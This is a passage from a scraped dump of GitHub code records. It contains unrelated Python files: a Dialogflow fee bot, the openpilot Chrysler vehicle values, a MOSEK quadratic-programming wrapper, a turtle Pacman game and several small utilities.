parse_dept(dept, url, headers)\n count += 1\n print('Sleep for 0.5sec')\n sleep(0.5 + random())\n\n","repo_name":"liao961120/SNA","sub_path":"final_project/104Crawl/crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"13895279011","text":"import sys\nimport getopt\nimport operator\n\nfrom parse_stat import *\n\ndef usage():\n print(\"Usage %s [-i|-o|-h] [--help|--input|--output|]\" % sys.argv[0])\n\n\ndef filter_stats_by_rwmixread(stats, f):\n seen = set()\n stats = [stat for stat in filter(f, stats) if not (stat.rwmixread in seen or seen.add(stat.rwmixread))]\n stats.sort(key=lambda stat: stat.rwmixread, reverse=True)\n return stats\n\ndef main():\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"hi:o\", [\"help\", \"input=\", \"output\"])\n except getopt.GetoptError as err:\n print(str(err))\n usage()\n sys.exit(2)\n\n inputs = []\n output = \"./output\"\n for opt, arg in opts:\n if opt in (\"-h\", \"--help\"):\n usage()\n sys.exit(1)\n elif opt in (\"-i\", \"--input\"):\n inputs.append(arg)\n elif opt in (\"-o\", \"--output\"):\n output = arg\n \n iodepts = [1, 2, 4, 8, 16, 32]\n\n lats = []\n for log_dir in inputs:\n stats = parse_dir(log_dir, lambda stat: True)\n\n lats.append(stats)\n\n\n # Define customized filter here\n rwmixreads = [100, 90, 80, 70, 60, 50]\n def f(stat):\n return stat.bs == \"4k\" and stat.rwmixread in rwmixreads and stat.iodepth == 32\n\n with Output(output, \"mix-read-bandwidth\") as f:\n f.write_head(\"label,100%,90%,80%,70%,60%,50%\") \n\n\n for stats in lats:\n stats = filter_stats_by_rwmixread(stats, \n lambda stat: stat.bs == \"4k\" and stat.rwmixread in rwmixreads and stat.iodepth == 32)\n if len(stats) == 0:\n continue\n\n disk_name = stats[0].disk_name\n f.write_stats(\"%s-Reads\" % disk_name, stats, lambda stat: \"%.1f\" % (stat.read.bw))\n f.write_stats(\"%s-Writes\" % disk_name, stats, lambda stat: \"%.1f\" % (stat.write.bw))\n f.write_stats(\"%s-Combines\" % disk_name, stats, lambda stat: \"%.1f\" % (stat.read.bw + stat.write.bw))\n\n with Output(output, \"mix-read-var-write-bandwidth\") as f:\n f.write_head(\"label,100%,90%,80%,70%,60%,50%\") \n\n\n for stats in lats:\n stats = filter_stats_by_rwmixread(stats, \n lambda stat: stat.bs == \"4k\" and stat.rwmixread in rwmixreads and stat.iodepth == 32)\n if len(stats) == 0:\n continue\n\n f.write_stats(\"%s-4KB Write\" % stats[0].disk_name, stats, lambda stat: \"%.1f\" % (stat.read.bw + stat.write.bw))\n \n for stats in lats:\n stats = filter_stats_by_rwmixread(stats, \n lambda stat: stat.bs == \"4k,128k\" and stat.rwmixread in rwmixreads and stat.iodepth == 32)\n if len(stats) == 0:\n continue\n\n f.write_stats(\"%s-128KB Write\" % stats[0].disk_name, stats, lambda stat: \"%.1f\" % (stat.read.bw + stat.write.bw))\n \n \n\nif __name__ == \"__main__\":\n main()","repo_name":"siddontang/fio-helper","sub_path":"parse_rwmixread_bw.py","file_name":"parse_rwmixread_bw.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"27"} +{"seq_id":"1007074666","text":"from pydialogflow_fulfillment import DialogflowResponse\nfrom pydialogflow_fulfillment import SimpleResponse, Confirmation, OutputContexts, Suggestions\nimport json\n\nCONTEXT_ASK_PROGRAMME = \"GetGraduateProgrammeFee-followup\"\n\nDATA_FILE = \"data/GetGraduateProgrammeFee.json\"\n\nwith open(DATA_FILE, 'r') as infile:\n data = json.load(infile)\n\ndef has_params(theKey, params):\n return theKey in params and params[theKey] != \"\"\n\ndef askProgramme(req):\n res = DialogflowResponse(\"What is the graduate programme you are looking at?\")\n res.add(OutputContexts(req.get_project_id(), req.get_session_id(),CONTEXT_ASK_PROGRAMME,5,req.get_paramters()))\n return res.get_final_response()\ndef askApplicationGroup(req):\n res = DialogflowResponse(\"Are you Singapore/PR or Non Singaporean?\")\n res.add(OutputContexts(req.get_project_id(), req.get_session_id(),CONTEXT_ASK_PROGRAMME,5,req.get_paramters()))\n return res.get_final_response()\ndef process(req):\n params = req.get_paramters()\n try:\n for con in req.get_ouputcontext_list():\n o_params = con[\"parameters\"]\n for x in o_params:\n params[x] = o_params[x]\n except:\n None\n\n print(params)\n if not has_params(\"graduate-programme\", params):\n return askProgramme(req)\n \n if not has_params(\"application-group\", params):\n return askApplicationGroup(req)\n application_group = \"\" if \"application-group\" not in params else params[\"application-group\"] \n graduate_programme = \"\" if \"graduate-programme\" not in params else params[\"graduate-programme\"]\n\n result = [item[\"answer\"] for item in data \n if item[\"graduate-programme\"] == graduate_programme \n and item[\"application-group\"] == application_group]\n\n if len(result) == 0:\n return DialogflowResponse(\"Unknown programme {0}\".format(graduate_programme)).get_final_response()\n return DialogflowResponse(\"The programme fee is {0}\".format(result[0])).get_final_response()","repo_name":"musicrokr/IRS-CS-2019-03-09-IS01PT-GRP-TheSundayLunatics-ISSAC","sub_path":"SystemCode/issac-backend/GetGraduateProgrammeFee.py","file_name":"GetGraduateProgrammeFee.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"34903579132","text":"from enum import IntFlag, StrEnum\nfrom dataclasses import dataclass, field\nfrom typing import Dict, List, Optional, Union\n\nfrom cereal import car\nfrom panda.python import uds\nfrom openpilot.selfdrive.car import dbc_dict\nfrom openpilot.selfdrive.car.docs_definitions import CarHarness, CarInfo, CarParts\nfrom openpilot.selfdrive.car.fw_query_definitions import FwQueryConfig, Request, p16\n\nEcu = car.CarParams.Ecu\n\n\nclass ChryslerFlags(IntFlag):\n HIGHER_MIN_STEERING_SPEED = 1\n\n\nclass CAR(StrEnum):\n # Chrysler\n PACIFICA_2017_HYBRID = \"CHRYSLER PACIFICA HYBRID 2017\"\n PACIFICA_2018_HYBRID = \"CHRYSLER PACIFICA HYBRID 2018\"\n PACIFICA_2019_HYBRID = \"CHRYSLER PACIFICA HYBRID 2019\"\n PACIFICA_2018 = \"CHRYSLER PACIFICA 2018\"\n PACIFICA_2020 = \"CHRYSLER PACIFICA 2020\"\n\n # Jeep\n JEEP_GRAND_CHEROKEE = \"JEEP GRAND CHEROKEE V6 2018\" # includes 2017 Trailhawk\n JEEP_GRAND_CHEROKEE_2019 = \"JEEP GRAND CHEROKEE 2019\" # includes 2020 Trailhawk\n\n # Ram\n RAM_1500 = \"RAM 1500 5TH GEN\"\n RAM_HD = \"RAM HD 5TH GEN\"\n\n\nclass CarControllerParams:\n def __init__(self, CP):\n self.STEER_STEP = 2 # 50 Hz\n self.STEER_ERROR_MAX = 80\n if CP.carFingerprint in RAM_HD:\n self.STEER_DELTA_UP = 14\n self.STEER_DELTA_DOWN = 14\n self.STEER_MAX = 361 # higher than this faults the EPS\n elif CP.carFingerprint in RAM_DT:\n self.STEER_DELTA_UP = 6\n self.STEER_DELTA_DOWN = 6\n self.STEER_MAX = 261 # EPS allows more, up to 350?\n else:\n self.STEER_DELTA_UP = 3\n self.STEER_DELTA_DOWN = 3\n self.STEER_MAX = 261 # higher than this faults the EPS\n\n\nSTEER_THRESHOLD = 120\n\nRAM_DT = {CAR.RAM_1500, }\nRAM_HD = {CAR.RAM_HD, }\nRAM_CARS = RAM_DT | RAM_HD\n\n\n@dataclass\nclass ChryslerCarInfo(CarInfo):\n package: str = \"Adaptive Cruise Control (ACC)\"\n car_parts: CarParts = field(default_factory=CarParts.common([CarHarness.fca]))\n\n\nCAR_INFO: Dict[str, Optional[Union[ChryslerCarInfo, List[ChryslerCarInfo]]]] = {\n CAR.PACIFICA_2017_HYBRID: ChryslerCarInfo(\"Chrysler Pacifica Hybrid 2017-18\"),\n CAR.PACIFICA_2018_HYBRID: None, # same platforms\n CAR.PACIFICA_2019_HYBRID: ChryslerCarInfo(\"Chrysler Pacifica Hybrid 2019-23\"),\n CAR.PACIFICA_2018: ChryslerCarInfo(\"Chrysler Pacifica 2017-18\"),\n CAR.PACIFICA_2020: [\n ChryslerCarInfo(\"Chrysler Pacifica 2019-20\"),\n ChryslerCarInfo(\"Chrysler Pacifica 2021\", package=\"All\"),\n ],\n CAR.JEEP_GRAND_CHEROKEE: ChryslerCarInfo(\"Jeep Grand Cherokee 2016-18\", video_link=\"https://www.youtube.com/watch?v=eLR9o2JkuRk\"),\n CAR.JEEP_GRAND_CHEROKEE_2019: ChryslerCarInfo(\"Jeep Grand Cherokee 2019-21\", video_link=\"https://www.youtube.com/watch?v=jBe4lWnRSu4\"),\n CAR.RAM_1500: ChryslerCarInfo(\"Ram 1500 2019-23\", car_parts=CarParts.common([CarHarness.ram])),\n CAR.RAM_HD: [\n ChryslerCarInfo(\"Ram 2500 2020-24\", car_parts=CarParts.common([CarHarness.ram])),\n ChryslerCarInfo(\"Ram 3500 2019-22\", car_parts=CarParts.common([CarHarness.ram])),\n ],\n}\n\n\nCHRYSLER_VERSION_REQUEST = bytes([uds.SERVICE_TYPE.READ_DATA_BY_IDENTIFIER]) + \\\n p16(0xf132)\nCHRYSLER_VERSION_RESPONSE = bytes([uds.SERVICE_TYPE.READ_DATA_BY_IDENTIFIER + 0x40]) + \\\n p16(0xf132)\n\nCHRYSLER_SOFTWARE_VERSION_REQUEST = bytes([uds.SERVICE_TYPE.READ_DATA_BY_IDENTIFIER]) + \\\n p16(uds.DATA_IDENTIFIER_TYPE.SYSTEM_SUPPLIER_ECU_SOFTWARE_NUMBER)\nCHRYSLER_SOFTWARE_VERSION_RESPONSE = bytes([uds.SERVICE_TYPE.READ_DATA_BY_IDENTIFIER + 0x40]) + \\\n p16(uds.DATA_IDENTIFIER_TYPE.SYSTEM_SUPPLIER_ECU_SOFTWARE_NUMBER)\n\nCHRYSLER_RX_OFFSET = -0x280\n\nFW_QUERY_CONFIG = FwQueryConfig(\n requests=[\n Request(\n [CHRYSLER_VERSION_REQUEST],\n [CHRYSLER_VERSION_RESPONSE],\n whitelist_ecus=[Ecu.abs, Ecu.eps, Ecu.srs, Ecu.fwdRadar, Ecu.fwdCamera, Ecu.combinationMeter],\n rx_offset=CHRYSLER_RX_OFFSET,\n bus=0,\n ),\n Request(\n [CHRYSLER_VERSION_REQUEST],\n [CHRYSLER_VERSION_RESPONSE],\n whitelist_ecus=[Ecu.abs, Ecu.hybrid, Ecu.engine, Ecu.transmission],\n bus=0,\n ),\n Request(\n [CHRYSLER_SOFTWARE_VERSION_REQUEST],\n [CHRYSLER_SOFTWARE_VERSION_RESPONSE],\n whitelist_ecus=[Ecu.engine, Ecu.transmission],\n bus=0,\n ),\n ],\n extra_ecus=[\n (Ecu.hybrid, 0x7e2, None), # manages transmission on hybrids\n (Ecu.abs, 0x7e4, None), # alt address for abs on hybrids\n ],\n)\n\n\nDBC = {\n CAR.PACIFICA_2017_HYBRID: dbc_dict('chrysler_pacifica_2017_hybrid_generated', 'chrysler_pacifica_2017_hybrid_private_fusion'),\n CAR.PACIFICA_2018: dbc_dict('chrysler_pacifica_2017_hybrid_generated', 'chrysler_pacifica_2017_hybrid_private_fusion'),\n CAR.PACIFICA_2020: dbc_dict('chrysler_pacifica_2017_hybrid_generated', 'chrysler_pacifica_2017_hybrid_private_fusion'),\n CAR.PACIFICA_2018_HYBRID: dbc_dict('chrysler_pacifica_2017_hybrid_generated', 'chrysler_pacifica_2017_hybrid_private_fusion'),\n CAR.PACIFICA_2019_HYBRID: dbc_dict('chrysler_pacifica_2017_hybrid_generated', 'chrysler_pacifica_2017_hybrid_private_fusion'),\n CAR.JEEP_GRAND_CHEROKEE: dbc_dict('chrysler_pacifica_2017_hybrid_generated', 'chrysler_pacifica_2017_hybrid_private_fusion'),\n CAR.JEEP_GRAND_CHEROKEE_2019: dbc_dict('chrysler_pacifica_2017_hybrid_generated', 'chrysler_pacifica_2017_hybrid_private_fusion'),\n CAR.RAM_1500: dbc_dict('chrysler_ram_dt_generated', None),\n CAR.RAM_HD: dbc_dict('chrysler_ram_hd_generated', None),\n}\n","repo_name":"neokii/glidepilot","sub_path":"selfdrive/car/chrysler/values.py","file_name":"values.py","file_ext":"py","file_size_in_byte":5300,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"27"} +{"seq_id":"28529355058","text":"def solution(amountText):\n answer = True\n if amountText.startswith(',') or amountText.endswith(','):\n return False\n splitted = amountText.split(',')\n if splitted[0].startswith('0'):return False\n for i in range(len(splitted)):\n if i > 0 and len(splitted[i]) != 3 :\n return False\n if not splitted[i].isdigit():\n return False\n\n return answer\n\nprint(solution('01,001,009'))","repo_name":"su-ram/Problem-Solving","sub_path":"프로그래머스/토스_Q3.py","file_name":"토스_Q3.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6321086275","text":"import types\r\nimport inspect\r\nfrom Chat import Chat\r\nfrom Item import Item\r\n\r\nSaveObjMembers = {\r\n \"Chat\" : Chat,\r\n \"Item\" : Item,\r\n}\r\n\r\nclass MetaClass(type):\r\n _class_filter_list = ('__module__', '__doc__')\r\n \r\n def __init__(cls, name, bases, dic):\r\n super().__init__(name, bases, dic)\r\n print(\"MetaClass init\",cls)\r\n funset = set()\r\n #处理函数\r\n for memClsName, memCls in SaveObjMembers.items():\r\n print(\"out funcName:\",memClsName, memCls)\r\n print(\"member:\",inspect.getmembers(memCls))\r\n print(\"member:\",inspect.getmembers(memCls, inspect.isfunction))\r\n for funcName, func in inspect.getmembers(memCls, inspect.isfunction):\r\n print(\"in funcName\")\r\n if funcName in ('__init__', '__new__', '__call__', '__setattr__', '__str__'):\r\n continue\r\n if funcName in funset:\r\n raise Exception('got duplicate method name: %s, %s' % (memCls.__name__, funcName))\r\n funset.add(funcName)\r\n print(\"funcName:\",funcName)\r\n setattr(cls, funcName, func)\r\n \r\n for membName, memb in inspect.getmembers(memCls):\r\n if membName in MetaClass._class_filter_list:\r\n continue\r\n\r\n if isinstance(memb, int) or \\\r\n isinstance(memb, str) or\\\r\n isinstance(memb, bytes) or \\\r\n isinstance(memb, list) or \\\r\n isinstance(memb, dict) or \\\r\n isinstance(memb, tuple) or \\\r\n isinstance(memb, float) or \\\r\n isinstance(memb, set) or \\\r\n isinstance(memb, frozenset):\r\n #检查属性是否重复\r\n if hasattr(cls, membName):\r\n raise Exception('got duplicate attr name: %s, %s' % (memCls.__name__, membName))\r\n #设置属性内容\r\n setattr(cls, membName, memb)\r\n","repo_name":"techxiaofei/cpp-practice","sub_path":"metaclass/MetaClass.py","file_name":"MetaClass.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"25208716838","text":"import sys\nimport mosek\nimport mosek_g\n# Since the actual value of Infinity is ignores, we define it solely\n# for symbolic purposes:\n\n\nclass mosek_quadraticp(object):\n\n\tdef __init__(self, params):\n\t\tparams = mosek_g.params_init(params)\n\t\tself._INF = mosek_g.INF\n\t\tself.C_obj = params['C_obj']\n\t\tself.Q_obj = params.get('Q_obj', None)\n\t\tself.A_con = params.get('A_con', None)\n\t\tself.A_con = list(map(list, zip(*params['A_con'])))\n\t\tself.Q_con = params.get('Q_con', None)\n\t\tself.buc = params.get('buc', None)\n\t\tself.blc = params.get('blc', None)\n\t\tself.bux = params.get('bux', None)\n\t\tself.blx = params.get('blx', None)\n\t\tself.initial = params.get('initial', None)\n\t\tself.minimize = params.get('minimize', True)\n\t\tself.integ_index = params.get('integ_index', [])\n\t\tself.silent = params.get('silent', True)\n\t\tself.bkc = []\n\t\tself.bkx = []\n\t\tself.asub = []\n\t\tself.aval = []\n\t\tself.numcon = len(self.buc)\n\t\tself.numvar = len(self.bux)\n\t\tself.max_time = params.get('max_time', 60)\n\t\tself.qsubi = []\n\t\tself.qsubj = []\n\t\tself.qval = []\n\t\tself.result = {\"x\": None, \"opti\": None, \"msg\": \"Do not finished.\", \"code\":-1}\n\n\tdef streamprinter(self, text):\n\t sys.stdout.write(text)\n\t sys.stdout.flush()\n\n\tdef fit(self, ):\n\t\twith mosek.Env() as env:\n\t\t\twith env.Task(0, 0) as task:\n\t\t\t\tif self.silent is False:\n\t\t\t\t\ttask.set_Stream(mosek.streamtype.log, self.streamprinter)\n\t\t\t\tfor i, j in zip(self.blc, self.buc):\n\t\t\t\t\tif i <= -self._INF and j >= self._INF:\n\t\t\t\t\t\tself.bkc.append(mosek.boundkey.fr)\n\t\t\t\t\telif i > -self._INF and j >= self._INF:\n\t\t\t\t\t\tself.bkc.append(mosek.boundkey.lo)\n\t\t\t\t\telif i > -self._INF and j < self._INF:\n\t\t\t\t\t\tself.bkc.append(mosek.boundkey.ra)\n\t\t\t\t\telif i <= -self._INF and j < self._INF:\n\t\t\t\t\t\tself.bkc.append(mosek.boundkey.up)\n\t\t\t\t\telif i == j and i > -self._INF and j < self._INF:\n\t\t\t\t\t\tself.bkc.append(mosek.boundkey.fx)\n\t\t\t\tfor i, j in zip(self.blx, self.bux):\n\t\t\t\t\tif i <= -self._INF and j >= self._INF:\n\t\t\t\t\t\tself.bkx.append(mosek.boundkey.fr)\n\t\t\t\t\telif i > -self._INF and j >= self._INF:\n\t\t\t\t\t\tself.bkx.append(mosek.boundkey.lo)\n\t\t\t\t\telif i > -self._INF and j < self._INF:\n\t\t\t\t\t\tself.bkx.append(mosek.boundkey.ra)\n\t\t\t\t\telif i <= -self._INF and j < self._INF:\n\t\t\t\t\t\tself.bkx.append(mosek.boundkey.up)\n\t\t\t\t\telif i == j and i > -self._INF and j < self._INF:\n\t\t\t\t\t\tself.bkx.append(mosek.boundkey.fx)\n\t\t\t\tif len(self.A_con) > 0:\n\t\t\t\t\tfor A_vec in self.A_con:\n\t\t\t\t\t\tasub_tmp = []\n\t\t\t\t\t\taval_tmp = []\n\t\t\t\t\t\tfor i, elm in enumerate(A_vec):\n\t\t\t\t\t\t\tif elm != 0:\n\t\t\t\t\t\t\t\tasub_tmp.append(i)\n\t\t\t\t\t\t\t\taval_tmp.append(float(elm))\n\t\t\t\t\t\tself.asub.append(asub_tmp)\n\t\t\t\t\t\tself.aval.append(aval_tmp)\n\n\t\t\t\ttask.appendcons(self.numcon)\n\t\t\t\ttask.appendvars(self.numvar)\n\t\t\t\tfor i in range(self.numvar):\n\t\t\t\t\t# Set the linear term c_i in the objective.\n\t\t\t\t\ttask.putcj(i, self.C_obj[i])\n\n\t\t\t\t\t# Set the bounds on variable i\n\t\t\t\t\t# blx[i] <= x_i <= bux[i]\n\t\t\t\t\n\t\t\t\t\ttask.putbound(mosek.accmode.var, i, self.bkx[i], self.blx[i], self.bux[i])\n\n\t\t\t\t\t\n\t\t\t\t\t# Input column i of A\n\t\t\t\t\t\n\t\t\t\t\tif len(self.A_con) > 0:\n\t\t\t\t\t\ttask.putacol(i, self.asub[i], self.aval[i])\n\t\t\t\tif self.numcon>0:\n\t\t\t\t\tfor i in range(self.numcon):\n\t\t\t\t\t task.putbound(mosek.accmode.con, i, self.bkc[i], self.blc[i], self.buc[i])\n\n\t\t\t\t# Set up and input quadratic objective\n\t\t\t\tself.qsubi = []\n\t\t\t\tself.qsubj = []\n\t\t\t\tself.qval = []\n\t\t\t\tif len(self.Q_obj)>0:\n\t\t\t\t\tfor i in range(0, self.numvar):\n\t\t\t\t\t\tfor j in range(0, i + 1):\n\t\t\t\t\t\t\tif abs(self.Q_obj[i][j]) >= mosek_g.EPS:\n\t\t\t\t\t\t\t\tself.qsubi.append(i)\n\t\t\t\t\t\t\t\tself.qsubj.append(j)\n\t\t\t\t\t\t\t\tself.qval.append(self.Q_obj[i][j])\n\t\t\t\t\ttask.putqobj(self.qsubi, self.qsubj, self.qval)\n\t\t\t\tfor k in range(0, self.numcon):\n\t\t\t\t\tif self.Q_con is None or len(self.Q_con) == 0:\n\t\t\t\t\t\tbreak\n\t\t\t\t\tQ_con_k = self.Q_con[k]\n\t\t\t\t\tif Q_con_k is None or len(Q_con_k)==0:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tself.qsubi = []\n\t\t\t\t\tself.qsubj = []\n\t\t\t\t\tself.qval = []\n\t\t\t\t\tfor i in range(0, len(Q_con_k)):\n\t\t\t\t\t\tfor j in range(0, i + 1):\n\t\t\t\t\t\t\tif abs(Q_con_k[i][j]) >= mosek_g.EPS:\n\t\t\t\t\t\t\t\tself.qsubi.append(i)\n\t\t\t\t\t\t\t\tself.qsubj.append(j)\n\t\t\t\t\t\t\t\tself.qval.append(Q_con_k[i][j])\n\t\t\t\t\ttask.putqconk(k, self.qsubi, self.qsubj, self.qval)\n\n\n\t\t\t\tif self.minimize is True:\n\t\t\t\t task.putobjsense(mosek.objsense.minimize)\n\t\t\t\telse:\n\t\t\t\t task.putobjsense(mosek.objsense.maximize)\n\t\t\t\t\n\t\t\t\ttask.optimize()\n\n\t\t\t\ttask.solutionsummary(mosek.streamtype.msg)\n\t\t\t\tprosta = task.getprosta(mosek.soltype.itr)\n\t\t\t\tsolsta = task.getsolsta(mosek.soltype.itr)\n\n\t\t\t\tif solsta == mosek.solsta.optimal or solsta == mosek.solsta.near_optimal:\n\t\t\t\t\tself.result[\"x\"] = [0.] * self.numvar\n\t\t\t\t\ttask.getxx(mosek.soltype.itr, self.result[\"x\"])\n\t\t\t\t\tself.result[\"opti\"] = task.getprimalobj(mosek.soltype.itr)\n\t\t\t\t\tself.result[\"code\"] = 0\n\t\t\t\t\tself.result[\"msg\"] = \"Optimal solution\"\n\t\t\t\telif solsta == mosek.solsta.dual_infeas_cer:\n\t\t\t\t\tself.result[\"msg\"] = \"Primal or dual infeasibility.\\n\"\n\t\t\t\telif solsta == mosek.solsta.prim_infeas_cer:\n\t\t\t\t\tself.result[\"msg\"] = \"Primal or dual infeasibility.\\n\"\n\t\t\t\telif solsta == mosek.solsta.near_dual_infeas_cer:\n\t\t\t\t\tself.result[\"msg\"] = \"Primal or dual infeasibility.\\n\"\n\t\t\t\telif solsta == mosek.solsta.near_prim_infeas_cer:\n\t\t\t\t\tself.result[\"msg\"] = \"Primal or dual infeasibility.\\n\"\n\t\t\t\telif mosek.solsta.unknown:\n\t\t\t\t\tself.result[\"msg\"] = \"Unknown solution status\"\n\t\t\t\telse:\n\t\t\t\t\tself.result[\"msg\"] = \"Other solution status\"\n\t\t\t\tprint(self.result[\"msg\"])\n\t\t\t\treturn self.result[\"code\"], self.result\n\n\ndef main():\n\tans = \"[0.4488485199618974, 0.9319361480448437, 0.6741131920778094]\"\n\n\n\tQ_obj = [[2, 0, -1], [0, 0.2, 0], [-1, 0, 2]]\n\tQ_con_0 = [[-2, 0, 0.2], [0, -2, 0], [0.2, 0, -0.2]]\n\tQ_con = [Q_con_0]\n\n\tparams = {\"C_obj\" : [0, -1, 0],\n \t\t \"Q_obj\" : Q_obj,\n \"A_con\" : [[1, 1, 1]],\n \"Q_con\" : Q_con,\n \"blc\" : [1],\n \"buc\" : [mosek_g.INF],\n \"blx\" : [0, 0, 0],\n \"bux\" : [mosek_g.INF, mosek_g.INF, mosek_g.INF],\n \"minimize\" :True,\n \"silent\": True\n }\n \n\n\tpro = mosek_quadraticp(params)\n\n\tcode, result = pro.fit()\n\n\tif code == 0:\n\t print(result)\n\n\nif __name__ == '__main__':\n\tmain()\n\n\n\n\n","repo_name":"youngfire/optimization_wapper","sub_path":"mosek_wrapper/mosek_quadratic.py","file_name":"mosek_quadratic.py","file_ext":"py","file_size_in_byte":6123,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"20211590094","text":"def binarySearch(arr, x):\n start = 0\n end = len(arr)\n while start <= end:\n mid = start + (end-start)//2\n if x < arr[mid]:\n end = mid - 1\n elif x > arr[mid]:\n start = mid + 1\n else:\n return True\n return False\n\n","repo_name":"thepankj/Data-Structures-and-Algorithms","sub_path":"General/Binary Search.py","file_name":"Binary Search.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"23465699055","text":"from globals import FOODMAX, STEPMAX, WIDTH, HEIGHT, X_MAX, Y_MAX, MS_TO_QUIT, SCALE\nfrom globals import FOOD as food\n# Import our own constants\n\nfrom game_original import ghost, dobbogi, pacman\n# Import our game character classes\n\nimport turtle\nimport random\n\ndef shutDownHander():\n \"\"\"Outputs score and terminates the program\"\"\"\n global score\n print('Your score:', score)\n window.bye()\n\ndef checkCollision(t1, t2):\n \"\"\"Input: 2 coordinate tuples.\n Return: True if the coordinates are sufficiently close\n False otherwise\n \"\"\"\n if (abs(t1[0] - t2[0]) < 25) and (abs(t1[1] - t2[1]) < 25):\n return True \n return False\n \ndef periodicTimer():\n\n global isQuit\n global food\n global score # pacman's achieved score\n turtle.tracer(0, 0) # disable screen updates\n\n\n p_old = pm.getPosition()\n pm.move() # move pacman\n p_new = pm.getPosition()\n # Check for illegal moves:\n if (abs(p_old[0] - p_new[0]) > 12) or (abs(p_old[1] - p_new[1]) > 12):\n print('Illegal move, game terminated.')\n isQuit = True\n turtle.update() # force turtle module's screen update\n turtle.tracer(1, 10) # re-enable periodic screen updates\n pm.decrementSteps() # pacman made one step, decrement counter\n if pm.getRemainingSteps() == 0:\n print('You ran out of steps!')\n isQuit = True \n\n pm_pos = pm.getPosition()\n\n # check collisions pm versus food:\n eaten_dishes = []\n for dish in food:\n if checkCollision(pm_pos, dish.getPosition()):\n pm.setIsYum()\n dish.setIsEaten()\n eaten_dishes.append(dish)\n score += 1\n # Remove eaten dishes (cannot remove while iterating!):\n for dish in eaten_dishes:\n food.remove(dish)\n # Check if all food has been eaten already:\n if len(food) == 0:\n print('Congratulation, all food collected.')\n isQuit = True\n\n if isQuit:\n # Game will terminate, put the \"Game Over\" image:\n game_over.setposition(0, -HEIGHT//2 + 22)\n game_over.shape('game_over.gif')\n game_over.showturtle()\n # Trigger the shutdown handler function to be called in MS_TO_QUIT ms\n # from now:\n window.ontimer(shutDownHander, MS_TO_QUIT)\n else:\n # Trigger the next firing of our timer function, in 90ms from now:\n window.ontimer(periodicTimer, 90)\n\ndef RightKeyHandler():\n \"\"\"Handler function for key-right events.\"\"\"\n pm.turnEast()\n\ndef LeftKeyHandler():\n \"\"\"Handler function for key-left events.\"\"\"\n pm.turnWest()\n\ndef UpKeyHandler():\n \"\"\"Handler function for key-up events.\"\"\"\n pm.turnNorth()\n\ndef DownKeyHandler():\n \"\"\"Handler function for key-down events.\"\"\"\n pm.turnSouth()\n\ndef quitKeyHandler():\n \"\"\"Handler function for the 'q' key.\"\"\"\n global isQuit\n isQuit = True\n\ndef placeFood():\n \"\"\"Compute doboggi screen positions and instantiate doboggi objects.\n Returns: a list of doboggi objects.\n \"\"\"\n food = []\n Upper = True\n for i in range(0, FOODMAX):\n ok = False\n while not ok: # loop until proper position was computed:\n r_x = random.randrange(-X_MAX + 20, X_MAX - 20)\n if Upper:\n r_y = random.randrange(160, Y_MAX)\n else: \n r_y = random.randrange(-Y_MAX, -40)\n new_pos = (r_x, r_y)\n HaveCollision = False \n for i in food:\n HaveCollision = HaveCollision or checkCollision(new_pos, i.getPosition()) \n if not HaveCollision:\n food.append(dobbogi(r_x, r_y))\n ok = True\n Upper = not Upper # toggle between ``above'' and ``below\" ghost's\n # screen part. \n return food\n\n#\n# Main program\n#\nisQuit = False # Set to true to initiate game termination.\nscore = 0\nturtle.setup(WIDTH, HEIGHT)\nwindow = turtle.Screen()\nwindow.title('Dobbogi-Man')\nwindow.bgcolor('black')\n\nturtle.register_shape('yum.gif')\nturtle.register_shape('game_over.gif')\n#\npm = pacman(120, -40) # Instantiate pacman object\n#\n#\n#\nfood += placeFood()\n# Prepare the \"game over\" turtle already:\ngame_over = turtle.Turtle()\ngame_over.hideturtle()\ngame_over.speed('fastest')\n# Install the keyboard handlers:\nwindow.onkey(RightKeyHandler, 'Right')\nwindow.onkey(LeftKeyHandler, 'Left')\nwindow.onkey(UpKeyHandler, 'Up')\nwindow.onkey(DownKeyHandler, 'Down')\nwindow.onkey(quitKeyHandler, 'q')\nperiodicTimer() # Call periodic timer function for the first time.\n # Subsequent calls will be triggered from inside\n # this function, by setting up a timer.\n\nwindow.listen()\nwindow.mainloop()\n","repo_name":"rmdwjdrhkrkatk/Robomaster","sub_path":"vision/Control/Game/Example/main_original.py","file_name":"main_original.py","file_ext":"py","file_size_in_byte":4399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4254870459","text":"from Account import Account\nfrom Car import Car\n\n\ndef main():\n\n car = Car(\"WFR687\", Account(name=\"Fredy Gonzales\", document=\"FG123\"))\n print(vars(car))\n print(vars(car.driver))\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"TheLionCoder/UberOOPCourse","sub_path":"Python/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"34857152339","text":"import dearpygui.dearpygui as dpg\nimport string\nimport nltk\n\nfrom helper.functions import categorize_words, pre_process, predict\nnltk.download('punkt')\nnltk.download('stopwords')\n\n# dearpygui expects these two args for callbacks\ndef check_spam(sender, data, pred=[]):\n # clear all previous instances of result related widgets\n try:\n dpg.delete_item(\"result_spacer_1\")\n dpg.delete_item(\"result_separator\")\n dpg.delete_item(\"result_spacer_2\")\n dpg.delete_item(\"result_text\")\n except Exception as e:\n # within try catch for first click incase these do not exist\n print(e)\n\n # get input value from the input text widget\n input_value = 